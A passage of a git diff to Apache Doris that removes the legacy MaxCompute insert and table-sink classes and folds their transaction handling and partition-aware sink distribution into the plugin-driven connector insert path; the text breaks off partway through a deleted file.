a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/MCInsertCommandContext.java +++ /dev/null @@ -1,84 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.nereids.trees.plans.commands.insert; - -import java.util.Map; - -/** - * Insert command context for MaxCompute tables. - */ -public class MCInsertCommandContext extends BaseExternalTableInsertCommandContext { - - private Map staticPartitionSpec; - private boolean overwrite; - private String sessionId; - private long blockIdStart; - private long blockIdCount; - private String writeSessionId; - - public MCInsertCommandContext() { - } - - public Map getStaticPartitionSpec() { - return staticPartitionSpec; - } - - public void setStaticPartitionSpec(Map staticPartitionSpec) { - this.staticPartitionSpec = staticPartitionSpec; - } - - public boolean isOverwrite() { - return overwrite; - } - - public void setOverwrite(boolean overwrite) { - this.overwrite = overwrite; - } - - public String getSessionId() { - return sessionId; - } - - public void setSessionId(String sessionId) { - this.sessionId = sessionId; - } - - public long getBlockIdStart() { - return blockIdStart; - } - - public void setBlockIdStart(long blockIdStart) { - this.blockIdStart = blockIdStart; - } - - public long getBlockIdCount() { - return blockIdCount; - } - - public void setBlockIdCount(long blockIdCount) { - this.blockIdCount = blockIdCount; - } - - public String getWriteSessionId() { - return writeSessionId; - } - - public void setWriteSessionId(String writeSessionId) { - this.writeSessionId = writeSessionId; - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/MCInsertExecutor.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/MCInsertExecutor.java deleted file mode 100644 index 47df06485e7546..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/MCInsertExecutor.java +++ /dev/null @@ -1,84 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.nereids.trees.plans.commands.insert; - -import org.apache.doris.common.UserException; -import org.apache.doris.datasource.maxcompute.MCTransaction; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalTable; -import org.apache.doris.nereids.NereidsPlanner; -import org.apache.doris.nereids.trees.plans.physical.PhysicalSink; -import org.apache.doris.planner.DataSink; -import org.apache.doris.planner.MaxComputeTableSink; -import org.apache.doris.planner.PlanFragment; -import org.apache.doris.qe.ConnectContext; -import org.apache.doris.transaction.TransactionType; - -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -import java.util.Optional; - -/** - * MCInsertExecutor for MaxCompute external table insert. - */ -public class MCInsertExecutor extends BaseExternalTableInsertExecutor { - - private static final Logger LOG = LogManager.getLogger(MCInsertExecutor.class); - - // Saved during finalizeSink() so we can inject writeSessionId before execution - private MaxComputeTableSink mcTableSink; - - public MCInsertExecutor(ConnectContext ctx, MaxComputeExternalTable table, - String labelName, NereidsPlanner planner, - Optional insertCtx, - boolean emptyInsert, long jobId) { - super(ctx, table, labelName, planner, insertCtx, emptyInsert, jobId); - } - - @Override - protected void finalizeSink(PlanFragment fragment, DataSink sink, PhysicalSink physicalSink) { - // Let parent call bindDataSink() to build the Thrift sink - super.finalizeSink(fragment, sink, physicalSink); - // Save reference so beforeExec() can inject writeSessionId later - mcTableSink = (MaxComputeTableSink) sink; - } - - @Override - protected void beforeExec() throws UserException { - // 1. Create Storage API write session as part of the transaction - MCTransaction transaction = (MCTransaction) transactionManager.getTransaction(txnId); - transaction.beginInsert((MaxComputeExternalTable) table, insertCtx); - - // 2. Inject write context into the Thrift sink before fragments are sent to BE - if (mcTableSink != null) { - mcTableSink.setWriteContext(txnId, transaction.getWriteSessionId()); - } - } - - @Override - protected void doBeforeCommit() throws UserException { - MCTransaction transaction = (MCTransaction) transactionManager.getTransaction(txnId); - loadedRows = transaction.getUpdateCnt(); - transaction.finishInsert(); - } - - @Override - protected TransactionType transactionType() { - return TransactionType.MAXCOMPUTE; - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertCommandContext.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertCommandContext.java index 2799a6c7b666a8..362adfebc8c62e 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertCommandContext.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertCommandContext.java @@ -17,10 +17,29 @@ package org.apache.doris.nereids.trees.plans.commands.insert; +import java.util.Collections; +import java.util.Map; + /** * Insert command context for plugin-driven connector catalogs. - * No additional fields — overwrite is inherited from BaseExternalTableInsertCommandContext. - * Connector plugins provide write config through the ConnectorWriteOps SPI. + * + *

{@code overwrite} is inherited from {@link BaseExternalTableInsertCommandContext}. + * The static partition spec — a generic {@code col -> val} map — is carried here and + * handed to the connector via the write context of + * {@code ConnectorWritePlanProvider.planWrite}. It is populated during sink binding + * (wired at the connector cutover) and defaults to empty, so a write with no static + * partition contributes nothing to partition pinning.

*/ public class PluginDrivenInsertCommandContext extends BaseExternalTableInsertCommandContext { + + private Map staticPartitionSpec = Collections.emptyMap(); + + public Map getStaticPartitionSpec() { + return staticPartitionSpec; + } + + public void setStaticPartitionSpec(Map staticPartitionSpec) { + this.staticPartitionSpec = + staticPartitionSpec == null ? Collections.emptyMap() : staticPartitionSpec; + } } diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertExecutor.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertExecutor.java index 4c1b5594102797..90df42442c419f 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertExecutor.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertExecutor.java @@ -27,12 +27,18 @@ import org.apache.doris.connector.api.ConnectorWriteOps; import org.apache.doris.connector.api.handle.ConnectorInsertHandle; import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.handle.ConnectorTransaction; import org.apache.doris.connector.api.write.ConnectorWriteType; import org.apache.doris.datasource.ConnectorColumnConverter; import org.apache.doris.datasource.ExternalTable; import org.apache.doris.datasource.PluginDrivenExternalCatalog; import org.apache.doris.nereids.NereidsPlanner; +import org.apache.doris.nereids.trees.plans.physical.PhysicalSink; +import org.apache.doris.planner.DataSink; +import org.apache.doris.planner.PlanFragment; +import org.apache.doris.planner.PluginDrivenTableSink; import org.apache.doris.qe.ConnectContext; +import org.apache.doris.transaction.PluginDrivenTransactionManager; import org.apache.doris.transaction.TransactionType; import org.apache.logging.log4j.LogManager; @@ -55,6 +61,10 @@ public class PluginDrivenInsertExecutor extends BaseExternalTableInsertExecutor private transient ConnectorSession connectorSession; private transient ConnectorWriteOps writeOps; private transient ConnectorWriteType resolvedWriteType; + // Non-null only for the SPI transaction model (e.g. maxcompute): opened in beginTransaction(), + // bound onto the sink's session in finalizeSink(), and committed via the transaction manager + // in onComplete(). Null for the JDBC / auto-commit insert-handle path. + private transient ConnectorTransaction connectorTx; /** * constructor @@ -66,14 +76,43 @@ public PluginDrivenInsertExecutor(ConnectContext ctx, ExternalTable table, super(ctx, table, labelName, planner, insertCtx, emptyInsert, jobId); } + @Override + public void beginTransaction() { + ensureConnectorSetup(); + if (writeOps.usesConnectorTransaction()) { + // SPI transaction model (e.g. maxcompute): open a connector transaction and let the + // plugin-driven transaction manager register it globally, so the BE block-allocation + // RPC and commit-data feedback can look it up by id. The ODPS write session that backs + // it is created later by planWrite (reached through finalizeSink -> bindDataSink). + connectorTx = writeOps.beginTransaction(connectorSession); + txnId = ((PluginDrivenTransactionManager) transactionManager).begin(connectorTx); + } else { + // JDBC / auto-commit handle model: allocate a no-op engine txn id. + super.beginTransaction(); + } + } + + @Override + protected void finalizeSink(PlanFragment fragment, DataSink sink, PhysicalSink physicalSink) { + // Transaction model: bind the connector transaction onto the SINK's session BEFORE + // super.finalizeSink -> bindDataSink -> planWrite, which reads it via + // ConnectorSession.getCurrentTransaction() (fail-loud if absent). The sink carries its own + // ConnectorSession built at translate time; the txn is shared with it by reference. + if (connectorTx != null && sink instanceof PluginDrivenTableSink) { + ((PluginDrivenTableSink) sink).getConnectorSession().setCurrentTransaction(connectorTx); + } + super.finalizeSink(fragment, sink, physicalSink); + } + @Override protected void beforeExec() throws UserException { - PluginDrivenExternalCatalog catalog = - (PluginDrivenExternalCatalog) ((ExternalTable) table).getCatalog(); - Connector connector = catalog.getConnector(); - connectorSession = catalog.buildConnectorSession(); - ConnectorMetadata metadata = connector.getMetadata(connectorSession); - writeOps = metadata; + if (connectorTx != null) { + // Transaction model: the write session was already created by planWrite (in + // finalizeSink). There is no per-statement insert handle to open here. + return; + } + // JDBC / auto-commit handle model. + ensureConnectorSetup(); if (!writeOps.supportsInsert()) { throw new UserException("Connector does not support INSERT for table: " + table.getName()); @@ -83,7 +122,7 @@ protected void beforeExec() throws UserException { ExternalTable extTable = (ExternalTable) table; String remoteDbName = extTable.getRemoteDbName(); String remoteTableName = extTable.getRemoteName(); - Optional tableHandle = metadata.getTableHandle( + Optional tableHandle = ((ConnectorMetadata) writeOps).getTableHandle( connectorSession, remoteDbName, remoteTableName); if (!tableHandle.isPresent()) { throw new UserException("Table not found via connector: " @@ -108,20 +147,44 @@ protected void doBeforeCommit() throws UserException { if (writeOps != null && insertHandle != null) { writeOps.finishInsert(connectorSession, insertHandle, Collections.emptyList()); } + if (connectorTx != null) { + // SPI transaction model (e.g. maxcompute): the BE sink reports row counts via the + // connector transaction's commit-data (TMCCommitData.row_count), NOT via the + // coordinator's DPP_NORMAL_ALL load counter, so AbstractInsertExecutor leaves + // loadedRows at 0. Backfill it here, mirroring legacy MCInsertExecutor.doBeforeCommit + // (loadedRows = transaction.getUpdateCnt()); without it the client / SHOW INSERT RESULT + // / audit log report "affected rows: 0" even though data was written. The commit itself + // happens via the transaction manager (onComplete), so no finishInsert is needed here. + // This branch is mutually exclusive with the insert-handle branch above (the transaction + // model never opens a per-statement insert handle). + loadedRows = connectorTx.getUpdateCnt(); + } } /** - * Post-commit refresh is best-effort for connector writes. + * Post-commit refresh is best-effort for ALL connector write paths — both the + * JDBC / auto-commit handle model and the SPI connector-transaction model + * (e.g. maxcompute). + * + *

By the time this runs, the remote write is already durably committed and + * FE cannot roll it back: for JDBC_WRITE the BE commits directly via + * PreparedStatement; for the connector-transaction path (maxcompute) the ODPS + * write session is committed by the transaction manager in onComplete, before + * this step. {@code super.doAfterCommit()} only refreshes FE-side metadata + * cache and writes an external-table refresh edit log (a cache-invalidation + * hint to followers); it never touches the already-committed remote data.

* - *

For JDBC_WRITE, the remote write is committed directly by BE via - * PreparedStatement — FE cannot roll it back. If the post-commit cache - * refresh fails (e.g., catalog dropped concurrently, edit log I/O error), - * reporting the INSERT as failed would mislead the user into retrying, - * causing duplicate data. The old JdbcInsertExecutor avoided this by - * not performing any post-commit work at all.

+ *

If that refresh fails (e.g., catalog dropped concurrently, edit log I/O + * error), reporting the INSERT as failed would mislead the user into retrying + * and writing duplicate data. The worst case of swallowing is transient cache + * staleness, which self-heals on the next refresh / TTL.

* - *

We preserve that safety guarantee while still attempting the refresh - * so that cache stays fresh in the common case.

+ *

This intentionally diverges from legacy MCInsertExecutor, which does not + * override doAfterCommit so a refresh failure propagates and the INSERT is + * reported FAILED (see deviations-log DV-018). We preserve the safer + * swallow-and-warn behavior — matching the old JdbcInsertExecutor, which did + * no post-commit work at all — while still attempting the refresh so the cache + * stays fresh in the common case.

*/ @Override protected void doAfterCommit() throws DdlException { @@ -150,12 +213,33 @@ protected void onFail(Throwable t) { @Override protected TransactionType transactionType() { + if (connectorTx != null) { + // SPI transaction model. maxcompute is currently the sole adopter; this value is + // profiling-only. Revisit when a second transaction-model connector arrives. + return TransactionType.MAXCOMPUTE; + } if (resolvedWriteType == ConnectorWriteType.JDBC_WRITE) { return TransactionType.JDBC; } return TransactionType.HMS; } + /** + * Lazily builds the connector session and write-ops handle for this insert. Idempotent so + * both {@link #beginTransaction()} and {@link #beforeExec()} can call it: the empty-insert + * path skips beginTransaction, so beforeExec must still be able to set up on its own. + */ + private void ensureConnectorSetup() { + if (connectorSession != null) { + return; + } + PluginDrivenExternalCatalog catalog = + (PluginDrivenExternalCatalog) ((ExternalTable) table).getCatalog(); + Connector connector = catalog.getConnector(); + connectorSession = catalog.buildConnectorSession(); + writeOps = connector.getMetadata(connectorSession); + } + /** * Converts a list of Doris {@link Column} to a list of {@link ConnectorColumn}. * This is the reverse of {@link org.apache.doris.datasource.ConnectorColumnConverter#convertColumns}. diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/logical/LogicalMaxComputeTableSink.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/logical/LogicalMaxComputeTableSink.java deleted file mode 100644 index 8514fcc885c60d..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/logical/LogicalMaxComputeTableSink.java +++ /dev/null @@ -1,156 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.nereids.trees.plans.logical; - -import org.apache.doris.catalog.Column; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalDatabase; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalTable; -import org.apache.doris.nereids.memo.GroupExpression; -import org.apache.doris.nereids.properties.LogicalProperties; -import org.apache.doris.nereids.trees.expressions.NamedExpression; -import org.apache.doris.nereids.trees.plans.AbstractPlan; -import org.apache.doris.nereids.trees.plans.Plan; -import org.apache.doris.nereids.trees.plans.PlanType; -import org.apache.doris.nereids.trees.plans.PropagateFuncDeps; -import org.apache.doris.nereids.trees.plans.algebra.Sink; -import org.apache.doris.nereids.trees.plans.commands.info.DMLCommandType; -import org.apache.doris.nereids.trees.plans.visitor.PlanVisitor; -import org.apache.doris.nereids.util.Utils; - -import com.google.common.base.Preconditions; -import com.google.common.collect.ImmutableList; - -import java.util.List; -import java.util.Objects; -import java.util.Optional; - -/** - * logical maxcompute table sink for insert command - */ -public class LogicalMaxComputeTableSink extends LogicalTableSink - implements Sink, PropagateFuncDeps { - private final MaxComputeExternalDatabase database; - private final MaxComputeExternalTable targetTable; - private final DMLCommandType dmlCommandType; - - /** - * constructor - */ - public LogicalMaxComputeTableSink(MaxComputeExternalDatabase database, - MaxComputeExternalTable targetTable, - List cols, - List outputExprs, - DMLCommandType dmlCommandType, - Optional groupExpression, - Optional logicalProperties, - CHILD_TYPE child) { - super(PlanType.LOGICAL_MAX_COMPUTE_TABLE_SINK, outputExprs, groupExpression, logicalProperties, cols, child); - this.database = Objects.requireNonNull(database, "database != null in LogicalMaxComputeTableSink"); - this.targetTable = Objects.requireNonNull(targetTable, "targetTable != null in LogicalMaxComputeTableSink"); - this.dmlCommandType = dmlCommandType; - } - - /** Update output expressions based on child output and replace child. */ - public Plan withChildAndUpdateOutput(Plan child) { - List output = child.getOutput().stream() - .map(NamedExpression.class::cast) - .collect(ImmutableList.toImmutableList()); - return AbstractPlan.copyWithSameId(this, () -> - new LogicalMaxComputeTableSink<>(database, targetTable, cols, output, - dmlCommandType, Optional.empty(), Optional.empty(), child)); - } - - @Override - public Plan withChildren(List children) { - Preconditions.checkArgument(children.size() == 1, "LogicalMaxComputeTableSink only accepts one child"); - return AbstractPlan.copyWithSameId(this, () -> - new LogicalMaxComputeTableSink<>(database, targetTable, cols, outputExprs, - dmlCommandType, Optional.empty(), Optional.empty(), children.get(0))); - } - - public LogicalMaxComputeTableSink withOutputExprs(List outputExprs) { - return AbstractPlan.copyWithSameId(this, () -> - new LogicalMaxComputeTableSink<>(database, targetTable, cols, outputExprs, - dmlCommandType, Optional.empty(), Optional.empty(), child())); - } - - public MaxComputeExternalDatabase getDatabase() { - return database; - } - - public MaxComputeExternalTable getTargetTable() { - return targetTable; - } - - public DMLCommandType getDmlCommandType() { - return dmlCommandType; - } - - @Override - public boolean equals(Object o) { - if (this == o) { - return true; - } - if (o == null || getClass() != o.getClass()) { - return false; - } - if (!super.equals(o)) { - return false; - } - LogicalMaxComputeTableSink that = (LogicalMaxComputeTableSink) o; - return dmlCommandType == that.dmlCommandType - && Objects.equals(database, that.database) - && Objects.equals(targetTable, that.targetTable) && Objects.equals(cols, that.cols); - } - - @Override - public int hashCode() { - return Objects.hash(super.hashCode(), database, targetTable, cols, dmlCommandType); - } - - @Override - public String toString() { - return Utils.toSqlString("LogicalMaxComputeTableSink[" + id.asInt() + "]", - "outputExprs", outputExprs, - "database", database.getFullName(), - "targetTable", targetTable.getName(), - "cols", cols, - "dmlCommandType", dmlCommandType - ); - } - - @Override - public R accept(PlanVisitor visitor, C context) { - return visitor.visitLogicalMaxComputeTableSink(this, context); - } - - @Override - public Plan withGroupExpression(Optional groupExpression) { - return AbstractPlan.copyWithSameId(this, () -> - new LogicalMaxComputeTableSink<>(database, targetTable, cols, outputExprs, - dmlCommandType, groupExpression, Optional.of(getLogicalProperties()), child())); - } - - @Override - public Plan withGroupExprLogicalPropChildren(Optional groupExpression, - Optional logicalProperties, List children) { - return AbstractPlan.copyWithSameId(this, () -> - new LogicalMaxComputeTableSink<>(database, targetTable, cols, outputExprs, - dmlCommandType, groupExpression, logicalProperties, children.get(0))); - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/physical/PhysicalConnectorTableSink.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/physical/PhysicalConnectorTableSink.java index 8d06c773dba014..daf0f2d08b3cf5 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/physical/PhysicalConnectorTableSink.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/physical/PhysicalConnectorTableSink.java @@ -22,8 +22,12 @@ import org.apache.doris.datasource.ExternalTable; import org.apache.doris.datasource.PluginDrivenExternalTable; import org.apache.doris.nereids.memo.GroupExpression; +import org.apache.doris.nereids.properties.DistributionSpecHiveTableSinkHashPartitioned; import org.apache.doris.nereids.properties.LogicalProperties; +import org.apache.doris.nereids.properties.MustLocalSortOrderSpec; +import org.apache.doris.nereids.properties.OrderKey; import org.apache.doris.nereids.properties.PhysicalProperties; +import org.apache.doris.nereids.trees.expressions.ExprId; import org.apache.doris.nereids.trees.expressions.NamedExpression; import org.apache.doris.nereids.trees.plans.AbstractPlan; import org.apache.doris.nereids.trees.plans.Plan; @@ -31,8 +35,11 @@ import org.apache.doris.nereids.trees.plans.visitor.PlanVisitor; import org.apache.doris.statistics.Statistics; +import java.util.ArrayList; import java.util.List; import java.util.Optional; +import java.util.Set; +import java.util.stream.Collectors; /** * Physical table sink for plugin-driven connector catalogs. @@ -104,17 +111,88 @@ public PhysicalPlan withPhysicalPropertiesAndStats(PhysicalProperties physicalPr } /** - * Get required physical properties for sink distribution. + * Get required physical properties for sink distribution. Generalizes the legacy + * {@code PhysicalMaxComputeTableSink.getRequirePhysicalProperties()} 3-branch behavior, gated + * by connector capabilities so non-partitioned connectors (JDBC, ES) keep the GATHER default: * - *

Connectors that declare {@code SUPPORTS_PARALLEL_WRITE} capability - * (e.g., Hive, Iceberg) use random partitioned distribution for parallel writers. - * All other connectors (e.g., JDBC, ES) default to GATHER (single writer) - * for transactional safety.

+ *
    + *
  • Dynamic-partition write (a partition column is present in {@code cols}) when the + * connector declares {@code SINK_REQUIRE_PARTITION_LOCAL_SORT}: hash-distribute by the + * partition columns and require a mandatory local sort on them. Streaming partition + * writers (MaxCompute Storage API) close the previous partition writer once a different + * partition value appears; un-grouped rows cause "writer has been closed".
  • + *
  • Non-partitioned / all-static-partition write when the connector declares + * {@code SUPPORTS_PARALLEL_WRITE}: {@code SINK_RANDOM_PARTITIONED} (parallel writers).
  • + *
  • Otherwise (e.g. JDBC, ES): {@code GATHER} (single writer) for transactional + * safety.
  • + *
+ * + *

Index by full schema, not {@code cols}. For a positional-write connector (one declaring + * {@code SINK_REQUIRE_FULL_SCHEMA_ORDER}, e.g. MaxCompute), {@code BindSink.bindConnectorTableSink} + * projects the child to full-schema order (any unmentioned / static-partition columns filled + * in), exactly like legacy {@code bindMaxComputeTableSink}, + * because the BE writer strips the trailing partition columns by position. So {@code child().getOutput()} + * is aligned 1:1 with {@code targetTable.getFullSchema()}, while {@code cols} excludes the static + * partition columns and may be in a different (user-specified) order. Partition columns are therefore + * located by their position in the full schema. (An earlier revision indexed by {@code cols}, which + * mislocated the dynamic column whenever {@code cols} order diverged from the full schema — the + * partial-static {@code PARTITION(p1='x') SELECT ..., p2} and reordered-explicit-list cases.)

*/ @Override public PhysicalProperties getRequirePhysicalProperties() { - if (targetTable instanceof PluginDrivenExternalTable - && ((PluginDrivenExternalTable) targetTable).supportsParallelWrite()) { + if (!(targetTable instanceof PluginDrivenExternalTable)) { + return PhysicalProperties.GATHER; + } + PluginDrivenExternalTable table = (PluginDrivenExternalTable) targetTable; + + if (table.requirePartitionLocalSortOnWrite()) { + Set partitionNames = table.getPartitionColumns().stream() + .map(Column::getName) + .collect(Collectors.toSet()); + if (!partitionNames.isEmpty()) { + // A partition column present in cols == its value comes from the query == a + // dynamic-partition write (static partition cols are excluded from cols by + // BindSink.bindConnectorTableSink). If any remains, this is a dynamic / partial-static + // write that must be hash-distributed and locally sorted by partition columns. + Set colNames = cols.stream() + .map(Column::getName) + .collect(Collectors.toSet()); + boolean hasDynamicPartition = partitionNames.stream().anyMatch(colNames::contains); + if (hasDynamicPartition) { + // Index by FULL-SCHEMA position, NOT cols. For a static / partial-static write the + // bind layer projects the child to full schema (static partition cols filled), so + // child().getOutput() is aligned 1:1 with the full schema while cols excludes the + // static partition cols. Indexing by full-schema position is required to hash/sort + // by the correct (dynamic) column in the partial-static case. Mirrors legacy + // PhysicalMaxComputeTableSink. + List columnIdx = new ArrayList<>(); + List fullSchema = targetTable.getFullSchema(); + for (int i = 0; i < fullSchema.size(); i++) { + if (partitionNames.contains(fullSchema.get(i).getName())) { + columnIdx.add(i); + } + } + List exprIds = columnIdx.stream() + .map(idx -> child().getOutput().get(idx).getExprId()) + .collect(Collectors.toList()); + DistributionSpecHiveTableSinkHashPartitioned shuffleInfo + = new DistributionSpecHiveTableSinkHashPartitioned(); + shuffleInfo.setOutputColExprIds(exprIds); + // Local sort by partition columns so rows for the same partition are grouped + // together before the streaming partition writer (MaxCompute Storage API closes a + // partition writer once a different partition value appears). + List orderKeys = columnIdx.stream() + .map(idx -> new OrderKey(child().getOutput().get(idx), true, false)) + .collect(Collectors.toList()); + return new PhysicalProperties(shuffleInfo) + .withOrderSpec(new MustLocalSortOrderSpec(orderKeys)); + } + // Partition columns exist but none in cols == all partitions statically specified; + // fall through to the parallel/gather branch (no sort/shuffle needed). + } + } + + if (table.supportsParallelWrite()) { return PhysicalProperties.SINK_RANDOM_PARTITIONED; } return PhysicalProperties.GATHER; diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/physical/PhysicalMaxComputeTableSink.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/physical/PhysicalMaxComputeTableSink.java deleted file mode 100644 index c02a2553e795ac..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/physical/PhysicalMaxComputeTableSink.java +++ /dev/null @@ -1,156 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.nereids.trees.plans.physical; - -import org.apache.doris.catalog.Column; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalDatabase; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalTable; -import org.apache.doris.nereids.memo.GroupExpression; -import org.apache.doris.nereids.properties.DistributionSpecHiveTableSinkHashPartitioned; -import org.apache.doris.nereids.properties.LogicalProperties; -import org.apache.doris.nereids.properties.MustLocalSortOrderSpec; -import org.apache.doris.nereids.properties.OrderKey; -import org.apache.doris.nereids.properties.PhysicalProperties; -import org.apache.doris.nereids.trees.expressions.ExprId; -import org.apache.doris.nereids.trees.expressions.NamedExpression; -import org.apache.doris.nereids.trees.plans.AbstractPlan; -import org.apache.doris.nereids.trees.plans.Plan; -import org.apache.doris.nereids.trees.plans.PlanType; -import org.apache.doris.nereids.trees.plans.visitor.PlanVisitor; -import org.apache.doris.statistics.Statistics; - -import java.util.ArrayList; -import java.util.List; -import java.util.Optional; -import java.util.Set; -import java.util.stream.Collectors; - -/** physical maxcompute table sink */ -public class PhysicalMaxComputeTableSink extends PhysicalBaseExternalTableSink { - - /** - * constructor - */ - public PhysicalMaxComputeTableSink(MaxComputeExternalDatabase database, - MaxComputeExternalTable targetTable, - List cols, - List outputExprs, - Optional groupExpression, - LogicalProperties logicalProperties, - CHILD_TYPE child) { - this(database, targetTable, cols, outputExprs, groupExpression, logicalProperties, - PhysicalProperties.GATHER, null, child); - } - - /** - * constructor - */ - public PhysicalMaxComputeTableSink(MaxComputeExternalDatabase database, - MaxComputeExternalTable targetTable, - List cols, - List outputExprs, - Optional groupExpression, - LogicalProperties logicalProperties, - PhysicalProperties physicalProperties, - Statistics statistics, - CHILD_TYPE child) { - super(PlanType.PHYSICAL_MAX_COMPUTE_TABLE_SINK, database, targetTable, cols, outputExprs, groupExpression, - logicalProperties, physicalProperties, statistics, child); - } - - @Override - public Plan withChildren(List children) { - return AbstractPlan.copyWithSameId(this, () -> new PhysicalMaxComputeTableSink<>( - (MaxComputeExternalDatabase) database, (MaxComputeExternalTable) targetTable, - cols, outputExprs, groupExpression, - getLogicalProperties(), physicalProperties, statistics, children.get(0))); - } - - @Override - public R accept(PlanVisitor visitor, C context) { - return visitor.visitPhysicalMaxComputeTableSink(this, context); - } - - @Override - public Plan withGroupExpression(Optional groupExpression) { - return AbstractPlan.copyWithSameId(this, () -> new PhysicalMaxComputeTableSink<>( - (MaxComputeExternalDatabase) database, (MaxComputeExternalTable) targetTable, cols, outputExprs, - groupExpression, getLogicalProperties(), child())); - } - - @Override - public Plan withGroupExprLogicalPropChildren(Optional groupExpression, - Optional logicalProperties, List children) { - return AbstractPlan.copyWithSameId(this, () -> new PhysicalMaxComputeTableSink<>( - (MaxComputeExternalDatabase) database, (MaxComputeExternalTable) targetTable, cols, outputExprs, - groupExpression, logicalProperties.get(), children.get(0))); - } - - @Override - public PhysicalPlan withPhysicalPropertiesAndStats(PhysicalProperties physicalProperties, Statistics statistics) { - return AbstractPlan.copyWithSameId(this, () -> new PhysicalMaxComputeTableSink<>( - (MaxComputeExternalDatabase) database, (MaxComputeExternalTable) targetTable, cols, outputExprs, - groupExpression, getLogicalProperties(), physicalProperties, statistics, child())); - } - - @Override - public PhysicalProperties getRequirePhysicalProperties() { - Set partitionNames = ((MaxComputeExternalTable) targetTable).getPartitionColumns().stream() - .map(Column::getName) - .collect(Collectors.toSet()); - if (!partitionNames.isEmpty()) { - // Check if any partition column is present in cols (the bound columns from SELECT). - // Static partition columns are excluded from cols by BindSink.bindMaxComputeTableSink(), - // so if no partition column remains in cols, all partitions are statically specified - // and we don't need sort/shuffle — all data goes to a single known partition. - Set colNames = cols.stream() - .map(Column::getName) - .collect(Collectors.toSet()); - boolean hasDynamicPartition = partitionNames.stream().anyMatch(colNames::contains); - if (!hasDynamicPartition) { - // All partition columns are statically specified, no sort needed - return PhysicalProperties.SINK_RANDOM_PARTITIONED; - } - - List columnIdx = new ArrayList<>(); - List fullSchema = targetTable.getFullSchema(); - for (int i = 0; i < fullSchema.size(); i++) { - Column column = fullSchema.get(i); - if (partitionNames.contains(column.getName())) { - columnIdx.add(i); - } - } - List exprIds = columnIdx.stream() - .map(idx -> child().getOutput().get(idx).getExprId()) - .collect(Collectors.toList()); - DistributionSpecHiveTableSinkHashPartitioned shuffleInfo - = new DistributionSpecHiveTableSinkHashPartitioned(); - 